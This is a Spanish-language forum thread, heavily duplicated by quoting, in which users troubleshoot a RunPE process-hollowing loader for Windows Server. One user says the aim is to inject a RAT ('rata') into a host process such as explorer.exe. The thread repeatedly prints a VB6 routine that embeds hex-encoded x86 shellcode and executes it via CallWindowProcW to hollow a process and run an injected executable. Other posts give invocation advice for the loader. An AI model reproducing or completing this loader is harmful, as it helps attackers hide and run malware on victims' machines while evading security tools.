Hola, ¿conoces una Runpe que funcione en Windows Server?
Siempre que esté compilado con las herramientas necesarias para esa versión no tendría por qué haber problema.
Puedes probar con este: [Enlace externo eliminado para invitados]
Puedes probar con este: [Enlace externo eliminado para invitados]
Bl4ckV escribió: 18 Nov 2023, 12:48 Siempre que esté compilado con las herramientas necesarias para esa versión no tendría por qué haber problema.
Puedes probar con este: [Enlace externo eliminado para invitados]
hola
printf("%s [host_exe] [injected_exe]\n", argv[0]); - original Intenté agregar los argumentos de esta manera pero no pasa nada.
modificado
printf("%s C:\\Windows\\System32\\notepad.exe C:\\Windows\\System32\\calc.exe\n", argv[0]); en lugar de rata uso bloc de notas e inyección en calc ¿algunas ideas?
printf("%s [host_exe] [injected_exe]\n", argv[0]); - original Intenté agregar los argumentos de esta manera pero no pasa nada.
modificado
printf("%s C:\\Windows\\System32\\notepad.exe C:\\Windows\\System32\\calc.exe\n", argv[0]); en lugar de rata uso bloc de notas e inyección en calc ¿algunas ideas?
supongo que tienes que compilarlo o usar el binario ya compilado de esta forma: compilado.exe C:\\Windows\\System32\\explorer.exe tuserver.exe
Holla Tomé un runpe, extraje el código de máquina y lo convertí a hex
tengo 2 preguntas
1. ¿Crees que mis argumentos son correctos al observar el código C++?
2. ¿Cómo indexar bytes desde el punto de entrada?
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
He intentado absolutamente todo pero no funciona y no funciona WereFault sigue apareciendo
¿Me puedes ayudar?
Converted
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Sub memory(ByVal path As String, payload() As Byte)
Dim ShellCode As String
ShellCode = "5589E55381ECC40000008B450C8945F08B45F00FB700663D4D5A0F85D30300008B45F08B403C89C28B450C01D08945EC8B45EC8B003D504500000F85B3030000C744240844000000C7442404000000008D8574FFFFFF890424E8000000005EC744240810000000C7442404000000008D45B8890424E800000000798D45B8894424248D8574FFFFFF89442420C744241C00000000C744241800000000C744241404000000C744241000000000C744240C00000000C744240800000000C7442404000000008B4508890424A100000000FFD083EC2885C00F95C084C00F8414030000C7042400000000A100000000FFD083EC04C74424040D000000890424A100000000FFD083EC088945E8C7042400000000A100000000FFD083EC04C74424041A000000890424A100000000FFD083EC088945E4C7042400000000A100000000FFD083EC04C744240429000000890424A100000000FFD083EC088945E0C7042400000000A100000000FFD083EC04C74424043B000000890424A100000000FFD083EC088945DCC744240C04000000C744240800100000C744240404000000C70424000000008B45E8FFD083EC108945D88B45D8C700070001008B45BC8B55D889542404890424A100000000FFD083EC0885C00F95C084C00F84190200008B45D88B80A400000083C00889C1"
ShellCode = ShellCode & "8B45B8C744241000000000C744240C040000008D9570FFFFFF89542408894C24048904248B45E0FFD083EC148B45EC8B40348B9570FFFFFF39D07541C704244E000000A100000000FFD083EC04C744240458000000890424A100000000FFD083EC088945D48B9570FFFFFF8B45B8895424048904248B45D4FFD083EC088B45EC8B50508B45EC8B403489C18B45B8C744241040000000C744240C0030000089542408894C24048904248B45E4FFD083EC148945D0837DD0000F844D0100008B45EC8B50548B45B8C7442410000000008954240C8B550C895424088B55D0895424048904248B45DCFFD083EC14C745F4000000008B45EC0FB740060FB7C03945F47D6D8B45F08B403C89C28B450C8D0C028B55F489D0C1E00201D0C1E00301C805F80000008945CC8B45CC8B50108B45CC8B48148B450C01C889C38B45CC8B480C8B45D001C889C18B45B8C7442410000000008954240C895C2408894C24048904248B45DCFFD083EC148345F401EB848B45EC8D50348B45D88B80A400000083C00889C18B45B8C744241000000000C744240C0400000089542408894C24048904248B45DCFFD083EC148B45EC8B50288B45D001C28B45D88990B0000000C704244E000000A100000000FFD083EC04C74424046D000000890424A100000000FFD083EC088945C88B45BC8B"
ShellCode = ShellCode & "55D8895424048904248B45C8FFD083EC088B45BC890424A100000000FFD083EC04C744240800800000C7442404000000008B450C890424A100000000FFD083EC0C908B5DFCC9C3909090"
Dim byteCount As Long
byteCount = Len(ShellCode) \ 2
Dim byteArray() As Byte
ReDim byteArray(byteCount - 1)
Dim i As Long
Dim k As Long
For i = 1 To Len(ShellCode) Step 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2))
k = k + 1
Next i
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
End Sub
tengo 2 preguntas
1. ¿Crees que mis argumentos son correctos al observar el código C++?
2. ¿Cómo indexar bytes desde el punto de entrada?
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
He intentado absolutamente todo pero no funciona y no funciona WereFault sigue apareciendo
¿Me puedes ayudar?
Converted
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Sub memory(ByVal path As String, payload() As Byte)
Dim ShellCode As String
ShellCode = "5589E55381ECC40000008B450C8945F08B45F00FB700663D4D5A0F85D30300008B45F08B403C89C28B450C01D08945EC8B45EC8B003D504500000F85B3030000C744240844000000C7442404000000008D8574FFFFFF890424E8000000005EC744240810000000C7442404000000008D45B8890424E800000000798D45B8894424248D8574FFFFFF89442420C744241C00000000C744241800000000C744241404000000C744241000000000C744240C00000000C744240800000000C7442404000000008B4508890424A100000000FFD083EC2885C00F95C084C00F8414030000C7042400000000A100000000FFD083EC04C74424040D000000890424A100000000FFD083EC088945E8C7042400000000A100000000FFD083EC04C74424041A000000890424A100000000FFD083EC088945E4C7042400000000A100000000FFD083EC04C744240429000000890424A100000000FFD083EC088945E0C7042400000000A100000000FFD083EC04C74424043B000000890424A100000000FFD083EC088945DCC744240C04000000C744240800100000C744240404000000C70424000000008B45E8FFD083EC108945D88B45D8C700070001008B45BC8B55D889542404890424A100000000FFD083EC0885C00F95C084C00F84190200008B45D88B80A400000083C00889C1"
ShellCode = ShellCode & "8B45B8C744241000000000C744240C040000008D9570FFFFFF89542408894C24048904248B45E0FFD083EC148B45EC8B40348B9570FFFFFF39D07541C704244E000000A100000000FFD083EC04C744240458000000890424A100000000FFD083EC088945D48B9570FFFFFF8B45B8895424048904248B45D4FFD083EC088B45EC8B50508B45EC8B403489C18B45B8C744241040000000C744240C0030000089542408894C24048904248B45E4FFD083EC148945D0837DD0000F844D0100008B45EC8B50548B45B8C7442410000000008954240C8B550C895424088B55D0895424048904248B45DCFFD083EC14C745F4000000008B45EC0FB740060FB7C03945F47D6D8B45F08B403C89C28B450C8D0C028B55F489D0C1E00201D0C1E00301C805F80000008945CC8B45CC8B50108B45CC8B48148B450C01C889C38B45CC8B480C8B45D001C889C18B45B8C7442410000000008954240C895C2408894C24048904248B45DCFFD083EC148345F401EB848B45EC8D50348B45D88B80A400000083C00889C18B45B8C744241000000000C744240C0400000089542408894C24048904248B45DCFFD083EC148B45EC8B50288B45D001C28B45D88990B0000000C704244E000000A100000000FFD083EC04C74424046D000000890424A100000000FFD083EC088945C88B45BC8B"
ShellCode = ShellCode & "55D8895424048904248B45C8FFD083EC088B45BC890424A100000000FFD083EC04C744240800800000C7442404000000008B450C890424A100000000FFD083EC0C908B5DFCC9C3909090"
Dim byteCount As Long
byteCount = Len(ShellCode) \ 2
Dim byteArray() As Byte
ReDim byteArray(byteCount - 1)
Dim i As Long
Dim k As Long
For i = 1 To Len(ShellCode) Step 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2))
k = k + 1
Next i
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
End Sub
holdtheline escribió: 20 Nov 2023, 16:08Holla Tomé un runpe, extraje el código de máquina y lo convertí a hex
tengo 2 preguntas
1. ¿Crees que mis argumentos son correctos al observar el código C++?
2. ¿Cómo indexar bytes desde el punto de entrada?
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
He intentado absolutamente todo pero no funciona y no funciona WereFault sigue apareciendo
¿Me puedes ayudar?
Converted
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Sub memory(ByVal path As String, payload() As Byte)
Dim ShellCode As String
ShellCode = "5589E55381ECC40000008B450C8945F08B45F00FB700663D4D5A0F85D30300008B45F08B403C89C28B450C01D08945EC8B45EC8B003D504500000F85B3030000C744240844000000C7442404000000008D8574FFFFFF890424E8000000005EC744240810000000C7442404000000008D45B8890424E800000000798D45B8894424248D8574FFFFFF89442420C744241C00000000C744241800000000C744241404000000C744241000000000C744240C00000000C744240800000000C7442404000000008B4508890424A100000000FFD083EC2885C00F95C084C00F8414030000C7042400000000A100000000FFD083EC04C74424040D000000890424A100000000FFD083EC088945E8C7042400000000A100000000FFD083EC04C74424041A000000890424A100000000FFD083EC088945E4C7042400000000A100000000FFD083EC04C744240429000000890424A100000000FFD083EC088945E0C7042400000000A100000000FFD083EC04C74424043B000000890424A100000000FFD083EC088945DCC744240C04000000C744240800100000C744240404000000C70424000000008B45E8FFD083EC108945D88B45D8C700070001008B45BC8B55D889542404890424A100000000FFD083EC0885C00F95C084C00F84190200008B45D88B80A400000083C00889C1"
ShellCode = ShellCode & "8B45B8C744241000000000C744240C040000008D9570FFFFFF89542408894C24048904248B45E0FFD083EC148B45EC8B40348B9570FFFFFF39D07541C704244E000000A100000000FFD083EC04C744240458000000890424A100000000FFD083EC088945D48B9570FFFFFF8B45B8895424048904248B45D4FFD083EC088B45EC8B50508B45EC8B403489C18B45B8C744241040000000C744240C0030000089542408894C24048904248B45E4FFD083EC148945D0837DD0000F844D0100008B45EC8B50548B45B8C7442410000000008954240C8B550C895424088B55D0895424048904248B45DCFFD083EC14C745F4000000008B45EC0FB740060FB7C03945F47D6D8B45F08B403C89C28B450C8D0C028B55F489D0C1E00201D0C1E00301C805F80000008945CC8B45CC8B50108B45CC8B48148B450C01C889C38B45CC8B480C8B45D001C889C18B45B8C7442410000000008954240C895C2408894C24048904248B45DCFFD083EC148345F401EB848B45EC8D50348B45D88B80A400000083C00889C18B45B8C744241000000000C744240C0400000089542408894C24048904248B45DCFFD083EC148B45EC8B50288B45D001C28B45D88990B0000000C704244E000000A100000000FFD083EC04C74424046D000000890424A100000000FFD083EC088945C88B45BC8B"
ShellCode = ShellCode & "55D8895424048904248B45C8FFD083EC088B45BC890424A100000000FFD083EC04C744240800800000C7442404000000008B450C890424A100000000FFD083EC0C908B5DFCC9C3909090"
Dim byteCount As Long
byteCount = Len(ShellCode) \ 2
Dim byteArray() As Byte
ReDim byteArray(byteCount - 1)
Dim i As Long
Dim k As Long
For i = 1 To Len(ShellCode) Step 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2))
k = k + 1
Next i
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
End Sub
Este código está escrito en Visual Basic, y no en c++ cuyo proyecto compartió Bl4ckV y vos comentaste agregando líneas en c++ ¿ Qué querés hacer?
Flight embedded" escribió: 22 Nov 2023, 09:24holdtheline escribió: 20 Nov 2023, 16:08Holla Tomé un runpe, extraje el código de máquina y lo convertí a hex
tengo 2 preguntas
1. ¿Crees que mis argumentos son correctos al observar el código C++?
2. ¿Cómo indexar bytes desde el punto de entrada?
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
He intentado absolutamente todo pero no funciona y no funciona WereFault sigue apareciendo
¿Me puedes ayudar?
Converted
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Sub memory(ByVal path As String, payload() As Byte)
Dim ShellCode As String
ShellCode = "5589E55381ECC40000008B450C8945F08B45F00FB700663D4D5A0F85D30300008B45F08B403C89C28B450C01D08945EC8B45EC8B003D504500000F85B3030000C744240844000000C7442404000000008D8574FFFFFF890424E8000000005EC744240810000000C7442404000000008D45B8890424E800000000798D45B8894424248D8574FFFFFF89442420C744241C00000000C744241800000000C744241404000000C744241000000000C744240C00000000C744240800000000C7442404000000008B4508890424A100000000FFD083EC2885C00F95C084C00F8414030000C7042400000000A100000000FFD083EC04C74424040D000000890424A100000000FFD083EC088945E8C7042400000000A100000000FFD083EC04C74424041A000000890424A100000000FFD083EC088945E4C7042400000000A100000000FFD083EC04C744240429000000890424A100000000FFD083EC088945E0C7042400000000A100000000FFD083EC04C74424043B000000890424A100000000FFD083EC088945DCC744240C04000000C744240800100000C744240404000000C70424000000008B45E8FFD083EC108945D88B45D8C700070001008B45BC8B55D889542404890424A100000000FFD083EC0885C00F95C084C00F84190200008B45D88B80A400000083C00889C1"
ShellCode = ShellCode & "8B45B8C744241000000000C744240C040000008D9570FFFFFF89542408894C24048904248B45E0FFD083EC148B45EC8B40348B9570FFFFFF39D07541C704244E000000A100000000FFD083EC04C744240458000000890424A100000000FFD083EC088945D48B9570FFFFFF8B45B8895424048904248B45D4FFD083EC088B45EC8B50508B45EC8B403489C18B45B8C744241040000000C744240C0030000089542408894C24048904248B45E4FFD083EC148945D0837DD0000F844D0100008B45EC8B50548B45B8C7442410000000008954240C8B550C895424088B55D0895424048904248B45DCFFD083EC14C745F4000000008B45EC0FB740060FB7C03945F47D6D8B45F08B403C89C28B450C8D0C028B55F489D0C1E00201D0C1E00301C805F80000008945CC8B45CC8B50108B45CC8B48148B450C01C889C38B45CC8B480C8B45D001C889C18B45B8C7442410000000008954240C895C2408894C24048904248B45DCFFD083EC148345F401EB848B45EC8D50348B45D88B80A400000083C00889C18B45B8C744241000000000C744240C0400000089542408894C24048904248B45DCFFD083EC148B45EC8B50288B45D001C28B45D88990B0000000C704244E000000A100000000FFD083EC04C74424046D000000890424A100000000FFD083EC088945C88B45BC8B"
ShellCode = ShellCode & "55D8895424048904248B45C8FFD083EC088B45BC890424A100000000FFD083EC04C744240800800000C7442404000000008B450C890424A100000000FFD083EC0C908B5DFCC9C3909090"
Dim byteCount As Long
byteCount = Len(ShellCode) \ 2
Dim byteArray() As Byte
ReDim byteArray(byteCount - 1)
Dim i As Long
Dim k As Long
For i = 1 To Len(ShellCode) Step 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2))
k = k + 1
Next i
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
End SubEste código está escrito en Visual Basic, y no en c++ cuyo proyecto compartió Bl4ckV y vos comentaste agregando líneas en c++ ¿ Qué querés hacer?
Quiero aislar el código shell que crea el proceso, etc. para poder convertirlo a hexadecimal y usarlo en vb6, ¿es posible?
